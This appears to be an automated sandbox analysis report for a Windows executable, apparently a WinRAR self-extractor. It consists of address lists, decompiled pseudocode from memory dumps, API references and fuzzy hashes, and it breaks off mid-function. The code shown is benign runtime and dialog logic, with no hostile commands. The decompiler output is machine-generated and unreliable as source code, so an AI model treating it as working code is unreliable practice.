    0x0084b88d
    0x0084b88f
    0x0084b895
    0x0084b897
    0x0084b89e
    0x0084b89f
    0x0084b8a6
    0x0084b8a8
    0x0084b8a8
    0x0084b8af
    0x0084b8b4
    0x0084b8ba
    0x0084b8bc
    0x00000000
    0x0084b8c2
    0x0084b8c2
    0x0084b8c2
    0x0084b8c5
    0x0084b8c7
    0x0084b8c8
    0x0084b8cb
    0x0084b8f4
    0x0084b8f4
    0x0084b8f7
    0x0084b9dc
    0x0084b9e5
    0x0084b9ea
    0x0084b9ea
    0x0084b9ec
    0x0084b9ec
    0x0084b9ee
    0x0084b9f0
    0x0084b9f7
    0x0084b9fc
    0x0084b9fd
    0x0084b9fe
    0x0084ba00
    0x0084ba02
    0x0084ba06
    0x0084ba08
    0x0084ba08
    0x0084ba0a
    0x0084ba0a
    0x0084ba06
    0x0084ba0e
    0x0084ba14
    0x0084ba21
    0x0084ba28
    0x0084ba38
    0x0084ba42
    0x0084ba4a
    0x0084ba56
    0x0084ba58
    0x0084ba60
    0x0084ba65
    0x0084ba66
    0x0084ba67
    0x0084ba69
    0x0084ba76
    0x0084ba7f
    0x0084ba7f
    0x00000000
    0x0084ba69
    0x0084b8fd
    0x0084b8fd
    0x0084b900
    0x0084b90d
    0x0084b90d
    0x0084b910
    0x0084b912
    0x0084b913
    0x0084b915
    0x0084b916
    0x0084b91b
    0x0084b920
    0x0084b926
    0x0084b928
    0x0084b92a
    0x0084b92d
    0x0084b934
    0x0084b935
    0x0084b93b
    0x0084b93c
    0x0084b93f
    0x0084b940
    0x0084b941
    0x0084b946
    0x0084b949
    0x0084b94f
    0x0084b958
    0x0084b95b
    0x0084b960
    0x0084b962
    0x0084b964
    0x0084b966
    0x0084b966
    0x0084b968
    0x0084b968
    0x0084b96a
    0x0084b96a
    0x0084b972
    0x0084b979
    0x0084b97b
    0x0084b982
    0x0084b988
    0x0084b98a
    0x0084b98b
    0x0084b993
    0x0084b9a2
    0x0084b9a2
    0x0084b993
    0x0084b9ad
    0x0084b9af
    0x0084b9be
    0x0084b9c4
    0x0084b9ca
    0x0084b9d5
    0x0084b9d5
    0x00000000
    0x0084b9ca
    0x0084b902
    0x0084b902
    0x0084b907
    0x00000000
    0x00000000
    0x00000000
    0x0084b907
    0x0084b8cd
    0x0084b8cd
    0x0084b8d1
    0x00000000
    0x00000000
    0x0084b8d3
    0x0084b8d3
    0x0084b8d6
    0x0084b8d8
    0x0084b8db
    0x00000000
    0x00000000
    0x0084b8e1
    0x0084b8ea
    0x00000000
    0x0084b8ea
    0x00000000
    0x0084ba86
    0x0084ba86
    0x0084ba87
    0x0084ba8c
    0x0084ba8e
    0x0084ba91
    0x0084ba91
    0x00000000
    0x0084bac7
    0x0084bac7
    0x0084bace
    0x0084bad0
    0x0084bad0
    0x0084bad2
    0x0084bb01
    0x0084bb01
    0x0084bb07
    0x00000000
    0x0084bb07
    0x0084bad4
    0x0084bad4
    0x0084bad4
    0x0084bad7
    0x0084baf0
    0x0084baf0
    0x0084baf6
    0x0084baf6
    0x00000000
    0x0084baf6
    0x0084bad9
    0x0084bad9
    0x0084bad9
    0x0084badc
    0x00000000
    0x00000000
    0x0084bade
    0x0084bade
    0x0084bade
    0x0084bae1
    0x00000000
    0x00000000
    0x0084bae7
    0x0084bae7
    0x00000000
    0x00000000
    0x0084bb54
    0x0084bb54
    0x0084bb57
    0x00000000
    0x00000000
    0x0084bb59
    0x0084bb59
    0x0084bb65
    0x0084bb6a
    0x0084bb6b
    0x0084bb6c
    0x0084bb6e
    0x00000000
    0x00000000
    0x0084bb70
    0x0084bb70
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x0084bd62
    0x0084bd62
    0x0084bd65
    0x0084bd67
    0x0084bd6e
    0x0084bd70
    0x0084bd76
    0x0084bd77
    0x0084bd7c
    0x0084bd7d
    0x0084bd7d
    0x0084bd82
    0x0084bd85
    0x0084bd8b
    0x0084bd8b
    0x0084bd90
    0x00000000
    0x00000000
    0x0084bd9c
    0x0084bd9c
    0x0084bd9f
    0x0084bb80
    0x0084bb80
    0x00000000
    0x0084bb80
    0x0084bda5
    0x0084bda5
    0x0084bb71
    0x0084bb71
    0x0084bb77
    0x0084bb78
    0x0084bb7b
    0x00000000
    0x00000000
    0x0084bdac
    0x0084bdac
    0x0084bdaf
    0x00000000
    0x00000000
    0x0084bdb5
    0x0084bdb5
    0x0084bdb7
    0x0084bdbe
    0x0084bdc6
    0x0084bdcc
    0x0084bdd1
    0x0084bdd4
    0x0084be09
    0x0084be0e
    0x0084be14
    0x0084be15
    0x0084be1a
    0x0084bdd6
    0x0084bdd6
    0x0084bdd9
    0x0084bddf
    0x0084bdf5
    0x0084bdfa
    0x0084bdfb
    0x0084be00
    0x0084bde1
    0x0084bde1
    0x0084bde6
    0x0084bde7
    0x0084bdec
    0x0084bdec
    0x0084bddf
    0x0084be21
    0x0084be23
    0x0084be2a
    0x0084be38
    0x0084be3f
    0x0084be44
    0x0084be45
    0x0084be46
    0x0084be48
    0x0084be49
    0x0084be50
    0x0084be99
    0x0084bea0
    0x0084bea5
    0x0084bea7
    0x00000000
    0x00000000
    0x0084bead
    0x0084bead
    0x0084beaf
    0x0084beb5
    0x0084bebc
    0x00000000
    0x00000000
    0x0084bebe
    0x0084bebe
    0x0084bec0
    0x0084bec1
    0x0084bec1
    0x0084bec1
    0x0084bec4
    0x0084bec7
    0x0084bed1
    0x0084bed1
    0x0084bed3
    0x0084bed5
    0x0084bedf
    0x0084bee4
    0x0084bee6
    0x0084bf24
    0x0084bf24
    0x0084bf27
    0x0084bf27
    0x0084bf29
    0x0084bf2a
    0x0084bf2a
    0x00000000
    0x0084bf2a
    0x0084bee8
    0x0084bee8
    0x0084beea
    0x0084beeb
    0x0084beed
    0x0084bef0
    0x0084bf05
    0x0084bf05
    0x0084bf07
    0x0084bf08
    0x0084bf08
    0x0084bf08
    0x0084bf0b
    0x0084bf0b
    0x0084bf10
    0x0084bf11
    0x0084bf17
    0x0084bf17
    0x0084bf18
    0x0084bf1d
    0x0084bf1e
    0x0084bf1f
    0x00000000
    0x0084bf1f
    0x0084bef2
    0x0084bef2
    0x0084bef9
    0x0084befc
    0x0084befd
    0x00000000
    0x0084befd
    0x0084bec9
    0x0084bec9
    0x0084becb
    0x0084becc
    0x0084becf
    0x00000000
    0x00000000
    0x00000000
    0x0084bf2c
    0x0084bf2c
    0x0084bf2f
    0x0084bf2f
    0x0084bf34
    0x0084bf36
    0x0084bf38
    0x0084bf38
    0x0084bf3a
    0x0084bf3a
    0x00000000
    0x0084be52
    0x0084be52
    0x0084be59
    0x0084be65
    0x0084be6b
    0x0084be6c
    0x0084be6d
    0x0084be72
    0x0084be75
    0x0084be77
    0x0084be7d
    0x0084be7f
    0x0084be8d
    0x0084be92
    0x0084be93
    0x0084be93
    0x0084bf3d
    0x0084bf3d
    0x0084bf45
    0x0084bf4a
    0x0084bf4c
    0x0084bf4d
    0x0084bf53
    0x0084bf54
    0x0084bf5a
    0x0084bf5b
    0x0084bf5b
    0x0084bf60
    0x0084bf61
    0x0084bf67
    0x0084bf68
    0x0084bf6e
    0x0084bf6f
    0x0084bf74
    0x0084bf7c
    0x0084bf88
    0x0084bf88
    0x0084bf95
    0x0084bf9a
    0x0084bfa2
    0x0084bfac
    0x0084bfb9
    0x0084bfc0
    0x0084bfc0
    0x0084bfcc
    0x0084bfd3
    0x0084bfd8
    0x0084bfe0
    0x0084bfe6
    0x0084bfe7
    0x0084bfe8
    0x0084bfea
    0x0084bfea
    0x0084bfff
    0x0084c004
    0x0084c010
    0x0084c012
    0x0084c023
    0x0084c030
    0x00000000
    0x0084c014
    0x0084c014
    0x0084c01f
    0x0084c021
    0x0084c035
    0x0084c035
    0x0084c037
    0x0084c03d
    0x0084c043
    0x0084c051
    0x0084c056
    0x0084c057
    0x0084c05f
    0x0084c064
    0x0084c06b
    0x0084c071
    0x0084c073
    0x0084c079
    0x0084c07f
    0x0084c081
    0x0084c08a
    0x0084c08d
    0x0084c08f
    0x0084c098
    0x0084c09b
    0x0084c0a1
    0x0084c0a4
    0x0084c0ad
    0x0084c0bc
    0x0084c0c1
    0x0084c0c9
    0x0084c0cb
    0x0084c0cc
    0x0084c0d2
    0x0084c0d3
    0x0084c0d5
    0x0084c0da
    0x0084c0da
    0x00000000
    0x0084c0c9
    0x00000000
    0x0084c021
    0x0084c012
    0x00000000
    0x0084c0e2
    0x0084c0e2
    0x0084c0e5
    0x0084c0e7
    0x0084c0e7
    0x00000000
    0x00000000
    0x0084bb13
    0x0084bb13
    0x0084bb1b
    0x0084bb21
    0x0084bb24
    0x0084bb48
    0x0084bb26
    0x0084bb26
    0x0084bb29
    0x0084bb3c
    0x0084bb2b
    0x0084bb2b
    0x0084bb2d
    0x0084bb32
    0x0084bb32
    0x0084bb29
    0x00000000
    0x00000000
    0x0084bb8c
    0x0084bb8c
    0x0084bb8d
    0x0084bb92
    0x0084bb92
    0x0084bb92
    0x0084bb95
    0x0084bb9a
    0x0084bba0
    0x0084bba0
    0x0084bba6
    0x0084bbac
    0x0084bbac
    0x00000000
    0x00000000
    0x0084b585
    0x0084b587
    0x0084b58c
    0x0084b592
    0x0084b595
    0x00000000
    0x0084b597
    0x0084b597
    0x00000000
    0x0084b597
    0x0084b595
    0x0084c11f
    0x0084c125
    0x0084c12f
    0x0084c12f
    0x0084bc34
    0x0084bc34
    0x0084bc3b
    0x00000000
    0x00000000
    0x0084bc41
    0x0084bc41
    0x0084bc43
    0x0084bc4a
    0x0084bc52
    0x0084bc53
    0x0084bc58
    0x0084bc59
    0x0084bc5a
    0x0084bc5c
    0x0084bcb0
    0x0084bcb0
    0x0084bcb8
    0x0084bcc6
    0x0084bcd7
    0x0084bce5
    0x0084bce5
    0x0084bcf1
    0x0084bcf6
    0x0084bcf8
    0x0084bd08
    0x0084bd12
    0x0084bd17
    0x0084bd1a
    0x00000000
    0x0084bd20
    0x0084bd20
    0x0084bd25
    0x0084bd25
    0x0084bd27
    0x0084bd2e
    0x0084bd34
    0x00000000
    0x0084bd34
    0x0084bd1a
    0x0084bc5e
    0x0084bc60
    0x0084bc62
    0x0084bc69
    0x00000000
    0x00000000
    0x0084bc6b
    0x0084bc6b
    0x0084bc6d
    0x0084bc73
    0x0084bc73
    0x0084bc73
    0x0084bc77
    0x00000000
    0x00000000
    0x0084bc79
    0x0084bc79
    0x0084bc7a
    0x0084bc80
    0x0084bc83
    0x0084bc85
    0x0084bc88
    0x00000000
    0x00000000
    0x0084bc8a
    0x00000000
    0x0084bc8a
    0x0084bc8c
    0x0084bc97
    0x0084bca1
    0x0084bca6
    0x0084bca6
    0x0084bca8
    0x00000000
    0x0084bd3a
    0x0084bd3a
    0x0084bd3d
    0x0084bd43
    0x0084bd4a
    0x0084bd4c
    0x0084bd4c
    0x0084bd56
    0x0084bd56
    0x00000000
    0x0084bd3d

    APIs
    • GetTempPathW.KERNEL32(00000800,?), ref: 0084BBCC
    • _swprintf.LIBCMT ref: 0084BC00
      • Part of subcall function 00833F53: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00833F66
    • SetDlgItemTextW.USER32(?,00000066,008785FA), ref: 0084BC20
    • _wcschr.LIBVCRUNTIME ref: 0084BC53
    • EndDialog.USER32(?,00000001), ref: 0084BD34
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
    • Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: DialogItemPathTempText__vswprintf_c_l_swprintf_wcschr
    • String ID: %s%s%u
    • API String ID: 2892007947-1360425832
    • Opcode ID: d7f04d44536fd88b8e17b336f0a718c446138388de984ee27a7142065b3b2349
    • Instruction ID: 963b02f3472527c24aa60608cb1a6ea69c8b1fa2dd01cfe3dcc5a39049e7f780
    • Opcode Fuzzy Hash: d7f04d44536fd88b8e17b336f0a718c446138388de984ee27a7142065b3b2349
    • Instruction Fuzzy Hash: 5741477194021DAEEF25DB64DC89EEE77B8FB04308F0080A6E519E6151EFB4DA848F91
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 82%
    			E0084892A(void* __edx) {
    				void* __ecx;
    				void* _t20;
    				short* _t24;
    				void* _t28;
    				signed int _t29;
    				intOrPtr _t31;
    				intOrPtr* _t38;
    				void* _t44;
    				void* _t58;
    				intOrPtr* _t60;
    				short* _t62;
    				short* _t64;
    				intOrPtr* _t67;
    				long _t69;
    				void* _t71;
    				void* _t72;
    
    				_t58 = __edx;
    				_t43 = _t44;
    				if( *((intOrPtr*)(_t44 + 0x10)) == 0) {
    					return _t20;
    				}
    				 *(_t71 + 4) =  *(_t71 + 4) & 0x00000000;
    				_t60 =  *((intOrPtr*)(_t71 + 0x18));
    				 *((char*)(_t71 + 0x1c)) = E00848810(_t60);
    				_push(0x200 + E00852B93(_t60) * 2);
    				_t24 = E00852BB3(_t44);
    				_t64 = _t24;
    				if(_t64 == 0) {
    					L16:
    					return _t24;
    				}
    				E00854DC3(_t64, L"<html>");
    				E00856763(_t64, L"<head><meta http-equiv=\"content-type\" content=\"text/html; charset=");
    				E00856763(_t64, L"utf-8\"></head>");
    				_t72 = _t71 + 0x18;
    				_t67 = _t60;
    				_t28 = 0x20;
    				if( *_t60 != _t28) {
    					L4:
    					_t29 = E0084145A(_t76, _t67, L"<html>", 6);
    					asm("sbb al, al");
    					_t31 =  ~_t29 + 1;
    					 *((intOrPtr*)(_t72 + 0x14)) = _t31;
    					if(_t31 != 0) {
    						_t60 = _t67 + 0xc;
    					}
    					E00856763(_t64, _t60);
    					if( *((char*)(_t72 + 0x1c)) == 0) {
    						E00856763(_t64, L"</html>");
    					}
    					_t79 =  *((char*)(_t72 + 0x1c));
    					if( *((char*)(_t72 + 0x1c)) == 0) {
    						_push(_t64);
    						_t64 = E00848B35(_t58, _t79);
    					}
    					_t69 = 9 + E00852B93(_t64) * 6;
    					_t62 = GlobalAlloc(0x40, _t69);
    					if(_t62 != 0) {
    						_t13 = _t62 + 3; // 0x3
    						if(WideCharToMultiByte(0xfde9, 0, _t64, 0xffffffff, _t13, _t69 - 3, 0, 0) == 0) {
    							 *_t62 = 0;
    						} else {
    							 *_t62 = 0xbbef;
    							 *((char*)(_t62 + 2)) = 0xbf;
    						}
    					}
    					L00852BAE(_t64);
    					_t24 =  *0x86dff8(_t62, 1, _t72 + 0x10);
    					if(_t24 >= 0) {
    						E00848847( *((intOrPtr*)(_t43 + 0x10)));
    						_t38 =  *((intOrPtr*)(_t72 + 0xc));
    						_t24 =  *((intOrPtr*)( *_t38 + 8))(_t38,  *((intOrPtr*)(_t72 + 0xc)));
    					}
    					goto L16;
    				} else {
    					goto L3;
    				}
    				do {
    					L3:
    					_t67 = _t67 + 2;
    					_t76 =  *_t67 - _t28;
    				} while ( *_t67 == _t28);
    				goto L4;
    			}



















    0x0084892a
    0x0084892d
    0x00848933
    0x00848a6f
    0x00848a6f
    0x00848939
    0x00848940
    0x0084894b
    0x0084895b
    0x0084895c
    0x00848961
    0x00848967
    0x00848a6a
    0x00000000
    0x00848a6b
    0x00848974
    0x0084897f
    0x0084898a
    0x0084898f
    0x00848992
    0x00848996
    0x0084899a
    0x008489a5
    0x008489ad
    0x008489b4
    0x008489b6
    0x008489b8
    0x008489bc
    0x008489be
    0x008489be
    0x008489c3
    0x008489cf
    0x008489d7
    0x008489dd
    0x008489de
    0x008489e3
    0x008489e5
    0x008489ed
    0x008489ed
    0x008489f9
    0x00848a05
    0x00848a09
    0x00848a13
    0x00848a28
    0x00848a35
    0x00848a2a
    0x00848a2a
    0x00848a2f
    0x00848a2f
    0x00848a28
    0x00848a39
    0x00848a47
    0x00848a50
    0x00848a5b
    0x00848a60
    0x00848a67
    0x00848a67
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x0084899c
    0x0084899c
    0x0084899c
    0x0084899f
    0x0084899f
    0x00000000

    APIs
    • GlobalAlloc.KERNEL32(00000040,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0084880B), ref: 008489FF
    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,?,00000000,00000000), ref: 00848A20
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
    • Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: AllocByteCharGlobalMultiWide
    • String ID: </html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
    • API String ID: 3286310052-4209811716
    • Opcode ID: 5f0a2e78b288721662d0ce4e021ee5c77b9a7eb540ca8d9b996dd3195b7d820e
    • Instruction ID: bda993a77fbcd8ca9b6a1330f764c06943297fd243173fd9596b0c0e6544108e
    • Opcode Fuzzy Hash: 5f0a2e78b288721662d0ce4e021ee5c77b9a7eb540ca8d9b996dd3195b7d820e
    • Instruction Fuzzy Hash: 5D312832104319BED314AB249C46F6F7BA8FF42721F10411EF911D62C2EFB49A1983A7
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 43%
    			E00849059(intOrPtr* __ecx, void* __eflags, intOrPtr _a4, struct HWND__* _a8, intOrPtr _a12, intOrPtr _a16, char _a20) {
    				struct tagRECT _v16;
    				intOrPtr _v28;
    				intOrPtr _v36;
    				void* __ebx;
    				void* __edi;
    				intOrPtr _t32;
    				struct HWND__* _t43;
    				intOrPtr* _t51;
    				void* _t58;
    				WCHAR* _t65;
    				struct HWND__* _t66;
    
    				_t66 = _a8;
    				_t51 = __ecx;
    				 *(__ecx + 8) = _t66;
    				 *((char*)(__ecx + 0x26)) = _a20;
    				ShowWindow(_t66, 0);
    				E00848DAA(_t51, _a4);
    				if( *((intOrPtr*)(_t51 + 0x1c)) != 0) {
    					L00852BAE( *((intOrPtr*)(_t51 + 0x1c)));
    				}
    				if(_a12 != 0) {
    					_push(_a12);
    					_t32 = E00856702(_t51, _t58);
    				} else {
    					_t32 = 0;
    				}
    				 *((intOrPtr*)(_t51 + 0x1c)) = _t32;
    				 *((intOrPtr*)(_t51 + 0x20)) = _a16;
    				GetWindowRect(_t66,  &_v16);
    				 *0x86df88(0,  *0x86dfd4(_t66,  &_v16, 2));
    				if( *(_t51 + 4) != 0) {
    					 *0x86df90( *(_t51 + 4));
    				}
    				_t39 = _v36;
    				_t19 = _t39 + 1; // 0x1
    				_t43 =  *0x86df98(0, L"RarHtmlClassName", 0, 0x40000000, _t19, _v36, _v28 - _v36 - 2, _v28 - _v36,  *0x86dfd4(_t66, 0,  *_t51, _t51, _t58));
    				 *(_t51 + 4) = _t43;
    				if( *((intOrPtr*)(_t51 + 0x10)) != 0) {
    					__eflags = _t43;
    					if(_t43 != 0) {
    						ShowWindow(_t43, 5);
    						return  *0x86df8c( *(_t51 + 4));
    					}
    				} else {
    					if(_t66 != 0 &&  *((intOrPtr*)(_t51 + 0x20)) == 0) {
    						_t75 =  *((intOrPtr*)(_t51 + 0x1c));
    						if( *((intOrPtr*)(_t51 + 0x1c)) != 0) {
    							_t43 = E00848E7C(_t51, _t75,  *((intOrPtr*)(_t51 + 0x1c)));
    							_t65 = _t43;
    							if(_t65 != 0) {
    								ShowWindow(_t66, 5);
    								SetWindowTextW(_t66, _t65);
    								return L00852BAE(_t65);
    							}
    						}
    					}
    				}
    				return _t43;
    			}














    0x00849062
    0x00849066
    0x0084906c
    0x0084906f
    0x00849072
    0x0084907e
    0x00849087
    0x0084908c
    0x00849091
    0x00849097
    0x0084909d
    0x008490a1
    0x00849099
    0x00849099
    0x00849099
    0x008490a7
    0x008490ae
    0x008490b7
    0x008490ce
    0x008490d8
    0x008490dd
    0x008490dd
    0x008490e3
    0x008490f1
    0x0084911e
    0x00849124
    0x0084912b
    0x00849165
    0x00849167
    0x0084916c
    0x00000000
    0x00849175
    0x0084912d
    0x0084912f
    0x00849136
    0x00849139
    0x00849140
    0x00849145
    0x00849149
    0x0084914e
    0x00849156
    0x00000000
    0x00849162
    0x00849149
    0x00849139
    0x0084912f
    0x00849181

    APIs
    • ShowWindow.USER32(?,00000000), ref: 00849072
    • GetWindowRect.USER32(?,00000000), ref: 008490B7
    • ShowWindow.USER32(?,00000005,00000000), ref: 0084914E
    • SetWindowTextW.USER32(?,00000000), ref: 00849156
    • ShowWindow.USER32(00000000,00000005), ref: 0084916C
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
    • Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: Window$Show$RectText
    • String ID: RarHtmlClassName
    • API String ID: 3937224194-1658105358
    • Opcode ID: 35472032ac2eaee99c51247d1075039c9034c1ec93be93874c7b1364dad24ae4
    • Instruction ID: 7455557565597885d83e2beb7ce2e6c2253d6658068b7c6913d6d34a7146f3e0
    • Opcode Fuzzy Hash: 35472032ac2eaee99c51247d1075039c9034c1ec93be93874c7b1364dad24ae4
    • Instruction Fuzzy Hash: 83318D31904319EFCB219F64DC48F5B7BA8FF48711F018559FD8AAA156CB74D804CB62
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E0085B561(intOrPtr _a4) {
    				void* _t18;
    
    				_t45 = _a4;
    				if(_a4 != 0) {
    					E0085B525(_t45, 7);
    					E0085B525(_t45 + 0x1c, 7);
    					E0085B525(_t45 + 0x38, 0xc);
    					E0085B525(_t45 + 0x68, 0xc);
    					E0085B525(_t45 + 0x98, 2);
    					E00857AC6( *((intOrPtr*)(_t45 + 0xa0)));
    					E00857AC6( *((intOrPtr*)(_t45 + 0xa4)));
    					E00857AC6( *((intOrPtr*)(_t45 + 0xa8)));
    					E0085B525(_t45 + 0xb4, 7);
    					E0085B525(_t45 + 0xd0, 7);
    					E0085B525(_t45 + 0xec, 0xc);
    					E0085B525(_t45 + 0x11c, 0xc);
    					E0085B525(_t45 + 0x14c, 2);
    					E00857AC6( *((intOrPtr*)(_t45 + 0x154)));
    					E00857AC6( *((intOrPtr*)(_t45 + 0x158)));
    					E00857AC6( *((intOrPtr*)(_t45 + 0x15c)));
    					return E00857AC6( *((intOrPtr*)(_t45 + 0x160)));
    				}
    				return _t18;
    			}




    0x0085b567
    0x0085b56c
    0x0085b575
    0x0085b580
    0x0085b58b
    0x0085b596
    0x0085b5a4
    0x0085b5af
    0x0085b5ba
    0x0085b5c5
    0x0085b5d3
    0x0085b5e1
    0x0085b5f2
    0x0085b600
    0x0085b60e
    0x0085b619
    0x0085b624
    0x0085b62f
    0x00000000
    0x0085b63f
    0x0085b644

    APIs
      • Part of subcall function 0085B525: _free.LIBCMT ref: 0085B54E
    • _free.LIBCMT ref: 0085B5AF
      • Part of subcall function 00857AC6: RtlFreeHeap.NTDLL(00000000,00000000,?,0085B553,?,00000000,?,00000000,?,0085B57A,?,00000007,?,?,0085B977,?), ref: 00857ADC
      • Part of subcall function 00857AC6: GetLastError.KERNEL32(?,?,0085B553,?,00000000,?,00000000,?,0085B57A,?,00000007,?,?,0085B977,?,?), ref: 00857AEE
    • _free.LIBCMT ref: 0085B5BA
    • _free.LIBCMT ref: 0085B5C5
    • _free.LIBCMT ref: 0085B619
    • _free.LIBCMT ref: 0085B624
    • _free.LIBCMT ref: 0085B62F
    • _free.LIBCMT ref: 0085B63A
    Memory Dump Source
    • Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
    • Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: _free$ErrorFreeHeapLast
    • String ID:
    • API String ID: 776569668-0
    • Opcode ID: 35f294bb21a7bd77ad2cd66a92d5d152bcc947fc6b4983fb665ce87d90ccf861
    • Instruction ID: 2cd83a77087471332d8275666201296d62cb15147bd24787a71942033fdaa673
    • Opcode Fuzzy Hash: 35f294bb21a7bd77ad2cd66a92d5d152bcc947fc6b4983fb665ce87d90ccf861
    • Instruction Fuzzy Hash: D7117F31941B08BAD931FBB4DC07FDBBB9DFF54702F448814BA99E6052EB24B6084652
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 95%
    			E00851694(void* __ecx, void* __edx) {
    				void* _t4;
    				void* _t11;
    				void* _t16;
    				long _t26;
    				void* _t29;
    
    				if( *0x86d680 != 0xffffffff) {
    					_t26 = GetLastError();
    					_t11 = E008528EB(__eflags,  *0x86d680);
    					__eflags = _t11 - 0xffffffff;
    					if(_t11 == 0xffffffff) {
    						L5:
    						_t11 = 0;
    					} else {
    						__eflags = _t11;
    						if(__eflags == 0) {
    							_t4 = E00852925(__eflags,  *0x86d680, 0xffffffff);
    							_pop(_t16);
    							__eflags = _t4;
    							if(_t4 != 0) {
    								_t29 = E00857B91(_t16, 1, 0x28);
    								__eflags = _t29;
    								if(__eflags == 0) {
    									L8:
    									_t11 = 0;
    									E00852925(__eflags,  *0x86d680, 0);
    								} else {
    									__eflags = E00852925(__eflags,  *0x86d680, _t29);
    									if(__eflags != 0) {
    										_t11 = _t29;
    										_t29 = 0;
    										__eflags = 0;
    									} else {
    										goto L8;
    									}
    								}
    								E00857AC6(_t29);
    							} else {
    								goto L5;
    							}
    						}
    					}
    					SetLastError(_t26);
    					return _t11;
    				} else {
    					return 0;
    				}
    			}








    0x0085169b
    0x008516ae
    0x008516b5
    0x008516b8
    0x008516bb
    0x008516d4
    0x008516d4
    0x008516bd
    0x008516bd
    0x008516bf
    0x008516c9
    0x008516cf
    0x008516d0
    0x008516d2
    0x008516e2
    0x008516e6
    0x008516e8
    0x008516fc
    0x008516fc
    0x00851705
    0x008516ea
    0x008516f8
    0x008516fa
    0x0085170e
    0x00851710
    0x00851710
    0x00000000
    0x00000000
    0x00000000
    0x008516fa
    0x00851713
    0x00000000
    0x00000000
    0x00000000
    0x008516d2
    0x008516bf
    0x0085171b
    0x00851725
    0x0085169d
    0x0085169f
    0x0085169f

    APIs
    • GetLastError.KERNEL32(?,?,0085168B,0084F0E2), ref: 008516A2
    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 008516B0
    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 008516C9
    • SetLastError.KERNEL32(00000000,?,0085168B,0084F0E2), ref: 0085171B
    Memory Dump Source
    • Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
    • Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: ErrorLastValue___vcrt_
    • String ID:
    • API String ID: 3852720340-0
    • Opcode ID: c0313ec98d82d3e9c9ecea7cac4f8dfa09689a8f86eb8f7568bf14f520bdb1e0
    • Instruction ID: a814cb85e47584b73b41b0276f51ffce1c799c74e0670c12cf9d4bb9635e8d63
    • Opcode Fuzzy Hash: c0313ec98d82d3e9c9ecea7cac4f8dfa09689a8f86eb8f7568bf14f520bdb1e0
    • Instruction Fuzzy Hash: F30128326097116EAF152A79BC89A162B94FB26377B210229FC10C91E1FF914C099151
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 77%
    			E0084D2D0() {
    				intOrPtr _t1;
    				_Unknown_base(*)()* _t3;
    				void* _t5;
    				_Unknown_base(*)()* _t6;
    				struct HINSTANCE__* _t14;
    
    				_t1 =  *0x88fe58;
    				if(_t1 != 1) {
    					if(_t1 == 0) {
    						_t14 = GetModuleHandleW(L"KERNEL32.DLL");
    						if(_t14 != 0) {
    							_t3 = GetProcAddress(_t14, "AcquireSRWLockExclusive");
    							if(_t3 == 0) {
